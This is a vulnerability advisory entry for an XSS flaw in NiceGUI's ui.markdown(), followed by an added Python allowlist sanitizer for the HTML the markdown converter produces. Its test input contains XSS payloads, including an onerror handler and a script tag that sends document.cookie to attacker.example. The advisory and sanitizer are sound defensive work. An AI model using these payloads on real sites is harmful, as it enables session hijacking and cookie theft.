| Field | Value |
|---|---|
| Vulnerability ID | VCID-2kbx-8xs3-p3gs |
| Aliases | CVE-2026-25516, GHSA-v82v-c5x8-w282 |
| Summary | NiceGUI's XSS vulnerability in `ui.markdown()` allows arbitrary JavaScript execution through unsanitized HTML content |
| Status | Published |
| Exploitability | None |
| Weighted Severity | None |
| Risk | None |

NiceGUI's `ui.markdown()` component converts markdown to HTML with the `markdown2` library and renders the result via `innerHTML`. By default `markdown2` passes raw HTML through unchanged, so an application that renders user-controlled content through `ui.markdown()` lets an attacker inject HTML carrying JavaScript event handlers, which then run in the browser of every user who views that page. (Assigning to `innerHTML` does not execute inserted `<script>` elements, but it does wire up attributes such as `onerror` on an `<img>` tag, which is enough for XSS.) Other NiceGUI components that render HTML (`ui.html()`, `ui.chat_message()`, `ui.interactive_image()`) expose a `sanitize` parameter; `ui.markdown()` neither offered that parameter nor sanitized by default, leaving such applications open to cross-site scripting. The upstream fix is the commit listed under references below.
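As an added example (not code from the NiceGUI project, from `markdown2`, or from the fixing commit), the following stdlib-only Python shows the step the advisory says `ui.markdown()` lacked: passing the HTML produced by the markdown converter through an allowlist sanitizer before it is assigned to `innerHTML`. The payload string is constructed for this example and stands in for the converter's output, which, as the advisory notes, contains any raw HTML the user supplied; the tag and attribute allowlists are assumptions chosen for the demo rather than a vetted production list. In a real application prefer a maintained sanitizer (such as `nh3` or `bleach`), or escape raw HTML at conversion time with `markdown2`'s `safe_mode="escape"` option.

```python
"""Allowlist sanitizer for HTML produced by a markdown converter (stdlib only).

Added example: not NiceGUI or markdown2 code. It models the missing step the
advisory describes: markdown2 passes raw HTML through, so anything handed to
innerHTML must be filtered first. The allowlists below are assumptions chosen
for the demo, not a vetted production list.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags that ordinary markdown output uses (assumed allowlist for this example).
ALLOWED_TAGS = {
    "p", "br", "hr", "strong", "em", "code", "pre", "blockquote",
    "ul", "ol", "li", "a", "img", "h1", "h2", "h3", "h4", "h5", "h6",
}
# Per-tag attributes to keep; everything else, including every on* handler, is dropped.
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "title"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br", "hr", "img"}
# Disallowed tags whose *content* must also go, not just the tag itself.
DROP_CONTENT = {"script", "style", "iframe", "object", "embed", "noscript", "template"}


def _safe_url(value):
    """True if the URL is relative or uses an allowlisted scheme.

    Browsers delete ASCII tab, LF and CR anywhere in a URL before parsing, so a
    value like "java\\nscript:alert(1)" would still run; strip those characters
    here before inspecting the scheme.
    """
    if value is None:
        return False
    cleaned = value.translate({9: None, 10: None, 13: None}).strip()
    scheme = urlparse(cleaned).scheme.lower()
    return scheme == "" or scheme in SAFE_SCHEMES


class AllowlistSanitizer(HTMLParser):
    """Re-serialises only allowlisted tags/attributes; text is re-escaped on output."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip = 0  # > 0 while inside a DROP_CONTENT element

    def _filter_attrs(self, tag, attrs):
        kept = []
        for name, value in attrs:  # HTMLParser lowercases names and decodes entities
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name in URL_ATTRS and not _safe_url(value):
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        return "".join(kept)

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self._skip += 1
        elif not self._skip and tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}{self._filter_attrs(tag, attrs)}>")
        # any other tag (div, span, svg, ...) is dropped but its text is kept

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self._skip = max(0, self._skip - 1)
        elif not self._skip and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data, quote=False))


def sanitize_html(rendered):
    """Filter converter output before it is assigned to innerHTML."""
    parser = AllowlistSanitizer()
    parser.feed(rendered)
    parser.close()
    return "".join(parser.out)


# Constructed attacker payload. Because markdown2 leaves raw HTML untouched by
# default, this string is also what the converter would emit for such input.
RENDERED_UNSAFE = (
    "<p>Hello <strong>world</strong></p>\n"
    '<img src="x" onerror="alert(document.cookie)">\n'
    '<a href="javascript:alert(1)">click</a>\n'
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>\n'
)

if __name__ == "__main__":
    print(sanitize_html(RENDERED_UNSAFE))
```

Run stand-alone, the script prints the payload with the `onerror` handler, the `javascript:` link target and the whole `<script>` element removed while the legitimate `<p>`, `<strong>`, `<img src="x">` and `<a>` markup survives. Working on the converter's output rather than on the markdown input is deliberate: escaping the input would also escape legitimate characters markdown needs, whereas an output allowlist leaves normal formatting intact.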
| Affected and Fixed Packages | Package Details |
| System | Score | Found at |
|---|---|---|
| There are no known severity scores. | | |
| Reference id | Reference type | URL |
|---|---|---|
| | | https://github.com/zauberzeug/nicegui |
| | | https://github.com/zauberzeug/nicegui/commit/f1f7533577875af7d23f161ed3627f73584cb561 |
| CVE-2026-25516 | | https://nvd.nist.gov/vuln/detail/CVE-2026-25516 |
| GHSA-v82v-c5x8-w282 | | https://github.com/advisories/GHSA-v82v-c5x8-w282 |
| GHSA-v82v-c5x8-w282 | | https://github.com/zauberzeug/nicegui/security/advisories/GHSA-v82v-c5x8-w282 |
No EPSS data available for this vulnerability.
| Date | Actor | Action | Source | VulnerableCode Version |
|---|---|---|---|---|
| 2026-06-02T04:49:58.191169+00:00 | GitLab Importer | Import | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/nicegui/CVE-2026-25516.yml | 38.6.0 |